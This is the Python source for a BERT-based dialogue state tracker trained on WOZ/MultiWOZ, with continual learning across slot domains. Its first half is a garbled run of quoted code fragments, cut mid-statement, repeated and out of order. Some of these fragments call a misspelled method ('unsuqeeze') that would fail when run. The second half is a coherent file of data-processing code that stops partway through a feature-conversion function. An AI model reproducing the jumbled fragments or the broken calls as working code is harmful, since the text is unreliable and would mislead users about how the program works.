"`InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of", "in dialog: text = turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']):", "input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids,", "task label_list = prev_label_list + target_label_list # All slot value labels num_labels =", "key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state", "trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard',", "dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch", "sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines): guid", "ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"):", "sequence length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx", "############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple", "(default value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\")", "BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input", "validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None,", "in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text = {} text['input']", "directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or turn\" )", "l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in", "Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data =", "if not acc == 1: dialog = [] for input, label, pred in", "range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for", "if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update =", "not care' if label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info", "/ args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. 
random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed)", "Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\", "slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if not", "0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1", "enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step)", "if label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info = ''", "prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss,", "< best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train:", "%s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids:", "train model. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='',", "least one of `do_train` or `do_eval` must be True.\") ############################################################################### # Load data", "key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): # remove", "args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu,", "help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag", "and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least \\\"gru\\\" or", "0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step, batch in", "Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and", "args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0)", "prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in", "- x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required", "output directory where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str,", "the random seed manually for reproducibility. 
random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0:", "n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN", "(args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax):", "num_labels, device) if args.fp16: model.half() # Load pretrained model # in the case", "% (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding", "max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0,", "validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The", "in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if not value", "= [] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in key)", "# line[3]: system response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label", "step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids,", "from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as", "label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc,", "line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx]", "+= prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1:", "else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss", "0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids,", "\\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy,", "in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids =", "and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\",", "= tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ = batch if", "!= -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,", "key) or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.'", "for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l", "default=0, help=\"Loss scaling to improve fp16 numeric stability. 
Only used when fp16 set", "to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on", "Present task label_list = prev_label_list + target_label_list # All slot value labels num_labels", "all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1:", "slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item()", "global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step +", "1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value", "that slot and values are different between the training and evaluation ptr_model =", "acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex", "in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list,", "Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\"", "= SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name)))", "apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate,", "tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ = batch if n_gpu", "warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for", "loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ =", "enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc)", "value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc +=", "/ nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if", "logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update", "############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update =", "idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: '", "config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: 
raise NotImplementedError()", "data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self,", "slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1", "# Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None", "parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data", "list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))", "t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in", "args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch", "{'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for", "= list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain if slot", "slot-type embeddings ## Note: slot embeddings are ordered as [previous slots + present", "required=True, help=\"The output directory where the model predictions and checkpoints will be written.\")", "and args.do_train: raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir,", "is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step", "all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training", "will be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\",", "0 and line[0][0] == '#': # ignore comments (starting with '#') continue lines.append(line)", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc", "f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids", "2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0)", "############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return", "'.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base", "max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if x != '#'", "loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "1) % args.gradient_accumulation_steps == 0: # modify learning rate with 
special warm up", "for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids", "be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random", "\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model =", "= [ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot *", "p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n,", "Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss", "convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ =", "in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params':", "raise ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn':", "model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw", "1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in", "not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")", "max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if", "batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\",", "'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in", "dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples", "max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len,", "model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file)", "== torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() ==", "data converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection", "len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop()", "= get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1:", "range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred:", "loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if 
args.gradient_accumulation_steps >", "data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt =='rnn':", "of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot =", "0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu", "eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for l in loss_slot]", "nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] =", "input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _,", "tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis", "0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]):", "required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\" )", "prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text)", "in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot *", "level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single", "parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\",", "= processor.get_prev_labels() # Slot value labels of Previous task target_label_list = processor.get_labels() #", "in the case that slot and values are different between the training and", "of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the", "prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx =", "def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean()", "[[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for", "prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev", "device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are ordered", "be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int,", "= acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, 
import csv
import os
import logging
import argparse
import random
import collections
import operator
from tqdm import tqdm, trange

import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from tensorboardX import SummaryWriter

from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam

import pdb
import matplotlib.pyplot as plt
import seaborn
seaborn.set_context(context="talk")

logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
                    datefmt='%m/%d/%Y %H:%M:%S',
                    level=logging.INFO)
logger = logging.getLogger(__name__)


###############################################################################
# Data Preprocessing
###############################################################################

class InputExample(object):
    """A single training/test example for the belief tracking dataset."""

    def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None):
        self.guid = guid
        self.text_a = text_a
        self.text_b = text_b
        self.label = label            # labels of slots in the present (target) task
        self.prev_label = prev_label  # labels of slots trained in previous tasks


class InputFeatures(object):
    """A single set of features of data."""

    def __init__(self, input_ids, input_len, label_id, prev_label_id):
        self.input_ids = input_ids
        self.input_len = input_len
        self.label_id = label_id
        self.prev_label_id = prev_label_id  # labels of slots trained in previous tasks


class DataProcessor(object):
    """Base class for data converters for sequence classification data sets."""

    def get_train_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the train set."""
        raise NotImplementedError()

    def get_dev_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the dev set."""
        raise NotImplementedError()

    def get_labels(self):
        """Gets the list of labels for this data set."""
        raise NotImplementedError()

    @classmethod
    def _read_tsv(cls, input_file, quotechar=None):
        """Reads a tab-separated value file, skipping comment lines (starting with '#')."""
        with open(input_file, "r", encoding="utf-8") as f:
            reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
            lines = []
            for line in reader:
                if len(line) > 0 and line[0][0] == '#':
                    continue
                lines.append(line)
            return lines
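
# A minimal illustration (not called anywhere) of the comment-skipping rule in
# _read_tsv above: rows whose first field starts with '#' are dropped. The
# sample rows are made up for the demo.
def _demo_read_tsv_skip_rule():
    import io
    sample = "# dialogue idx\tturn idx\tuser\tsystem\n1\t0\thello\thi there\n"
    reader = csv.reader(io.StringIO(sample), delimiter="\t")
    # returns [['1', '0', 'hello', 'hi there']]
    return [line for line in reader if not (len(line) > 0 and line[0][0] == '#')]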
class Processor(DataProcessor):
    """Processor for the belief tracking dataset (GLUE version)."""

    def __init__(self, config):
        super(Processor, self).__init__()
        import json

        if config.data_dir == "data/woz" or config.data_dir == "data/woz-turn":
            fp_ontology = open(os.path.join(config.data_dir, "ontology_dstc2_en.json"), "r")
            ontology = json.load(fp_ontology)
            ontology = ontology["informable"]
            del ontology["request"]
            for slot in ontology.keys():
                ontology[slot].append("do not care")
                ontology[slot].append("none")
            fp_ontology.close()
        elif config.data_dir == "data/multiwoz":
            fp_ontology = open(os.path.join(config.data_dir, "ontology.json"), "r")
            ontology = json.load(fp_ontology)
            for slot in ontology.keys():
                ontology[slot].append("none")
            fp_ontology.close()
        else:
            raise NotImplementedError()

        if not config.target_slot == 'all':
            slot_idx = {'attraction': '0:1:2', 'bus': '3:4:5:6', 'hospital': '7',
                        'hotel': '8:9:10:11:12:13:14:15:16:17',
                        'restaurant': '18:19:20:21:22:23:24',
                        'taxi': '25:26:27:28', 'train': '29:30:31:32:33:34'}
            target_slot = []
            prev_slot = []
            for key, value in slot_idx.items():
                if key == config.target_slot:
                    target_slot.append(value)
                else:
                    prev_slot.append(value)
            config.target_slot = ':'.join(target_slot)
            config.prev_slot = ':'.join(prev_slot)
        else:
            raise NotImplementedError()

        # sorting the ontology according to the alphabetic order of the slots
        self.ontology = collections.OrderedDict(sorted(ontology.items()))

        # select slots to train
        self.target_slot = []
        self.prev_slot = []
        self.target_slot_idx = sorted([int(x) for x in config.target_slot.split(':')])
        self.prev_slot_idx = sorted([int(x) for x in config.prev_slot.split(':')])
        ontology_items = list(self.ontology.items())
        for idx, domain in enumerate(ontology_items):
            slot, value = domain
            if slot == "pricerange":
                slot = "price range"
            if idx in self.target_slot_idx:
                self.target_slot.append(slot)
            elif idx in self.prev_slot_idx:
                self.prev_slot.append(slot)

        self.all_slot = self.prev_slot + self.target_slot
        logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))
        logger.info('Processor: target slots: ' + ', '.join(self.target_slot))

    def get_train_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "train.tsv")), "train", accumulation)

    def get_dev_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev", accumulation)

    def get_test_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test.tsv")), "test", accumulation)

    def get_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.target_slot]

    def get_prev_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.prev_slot]

    def _create_examples(self, lines, set_type, accumulation=False):
        """Creates examples for the training and dev sets."""
        prev_dialogue_index = None
        examples = []
        for (i, line) in enumerate(lines):
            guid = "%s-%s-%s" % (set_type, line[0], line[1])  # line[0]: dialogue index, line[1]: turn index
            if accumulation:
                if prev_dialogue_index is None or prev_dialogue_index != line[0]:
                    text_a = line[2]
                    text_b = line[3]
                    prev_dialogue_index = line[0]
                else:
                    # The symbol '#' will be replaced with '[SEP]' after tokenization.
                    text_a = line[2] + " # " + text_a
                    text_b = line[3] + " # " + text_b
            else:
                text_a = line[2]  # line[2]: user utterance
                text_b = line[3]  # line[3]: system response
            label = [line[4 + idx] for idx in self.target_slot_idx]
            prev_label = [line[4 + idx] for idx in self.prev_slot_idx]
            examples.append(
                InputExample(guid=guid, text_a=text_a, text_b=text_b,
                             label=label, prev_label=prev_label))
        return examples
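
# Illustration only (not called anywhere): the domain -> target/previous
# slot-index split that Processor.__init__ performs for MultiWOZ. The slot_idx
# table mirrors the one above; 'hotel' as the target domain is just an example.
def _demo_slot_split(target_domain='hotel'):
    slot_idx = {'attraction': '0:1:2', 'bus': '3:4:5:6', 'hospital': '7',
                'hotel': '8:9:10:11:12:13:14:15:16:17',
                'restaurant': '18:19:20:21:22:23:24',
                'taxi': '25:26:27:28', 'train': '29:30:31:32:33:34'}
    target, prev = [], []
    for domain, idxs in slot_idx.items():
        (target if domain == target_domain else prev).append(idxs)
    # e.g. ('8:9:10:11:12:13:14:15:16:17', '0:1:2:3:4:5:6:7:18:...:34')
    return ':'.join(target), ':'.join(prev)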
def convert_examples_to_features(examples, label_list, prev_label_list,
                                 max_seq_length, tokenizer, max_turn_length):
    """Loads a data file into a list of `InputFeatures`s."""

    slot_dim = len(label_list)
    prev_slot_dim = len(prev_label_list)

    def _hard_coding_label(label):
        return 'do not care' if label == 'dontcare' else label

    def _get_label(label, label_list):
        label_id = []
        label_info = ''
        label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
        for i, label in enumerate(label):
            label = _hard_coding_label(label)
            label_id.append(label_map[i][label])
            label_info += '%s (id = %d) ' % (label, label_map[i][label])
        return label_id, label_info

    features = []
    prev_dialogue_idx = None
    all_padding = [0] * max_seq_length
    all_padding_len = [0, 0]

    max_turn = 0
    for (ex_index, example) in enumerate(examples):
        if max_turn < int(example.guid.split('-')[2]):
            max_turn = int(example.guid.split('-')[2])
    max_turn_length = min(max_turn + 1, max_turn_length)
    logger.info("max_turn_length = %d" % max_turn)

    for (ex_index, example) in enumerate(examples):
        tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
        tokens_b = None
        if example.text_b:
            tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
            # Account for [CLS], [SEP], [SEP] with "- 3"
            _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
        else:
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens_a) > max_seq_length - 2:
                tokens_a = tokens_a[:(max_seq_length - 2)]

        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        input_len = [len(tokens), 0]
        if tokens_b:
            tokens += tokens_b + ["[SEP]"]
            input_len[1] = len(tokens_b) + 1

        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        # Zero-pad up to the sequence length.
        input_ids += [0] * (max_seq_length - len(input_ids))
        assert len(input_ids) == max_seq_length

        label_id, label_info = _get_label(example.label, label_list)
        prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)

        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % example.guid)
            logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
            logger.info("label: " + label_info)
            logger.info("prev label: " + prev_label_info)

        curr_dialogue_idx = example.guid.split('-')[1]
        curr_turn_idx = int(example.guid.split('-')[2])

        # pad the previous dialogue with empty turns up to max_turn_length
        if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
            if prev_turn_idx < max_turn_length:
                features += [InputFeatures(input_ids=all_padding,
                                           input_len=all_padding_len,
                                           label_id=[-1] * slot_dim,
                                           prev_label_id=[-1] * prev_slot_dim)] \
                            * (max_turn_length - prev_turn_idx - 1)
            assert len(features) % max_turn_length == 0

        if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:
            features.append(InputFeatures(input_ids=input_ids,
                                          input_len=input_len,
                                          label_id=label_id,
                                          prev_label_id=prev_label_id))

        prev_dialogue_idx = curr_dialogue_idx
        prev_turn_idx = curr_turn_idx

    # pad the last dialogue as well
    if prev_turn_idx < max_turn_length:
        features += [InputFeatures(input_ids=all_padding,
                                   input_len=all_padding_len,
                                   label_id=[-1] * slot_dim,
                                   prev_label_id=[-1] * prev_slot_dim)] \
                    * (max_turn_length - prev_turn_idx - 1)
    assert len(features) % max_turn_length == 0

    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_len = torch.tensor([f.input_len for f in features], dtype=torch.long)
    all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
    all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)

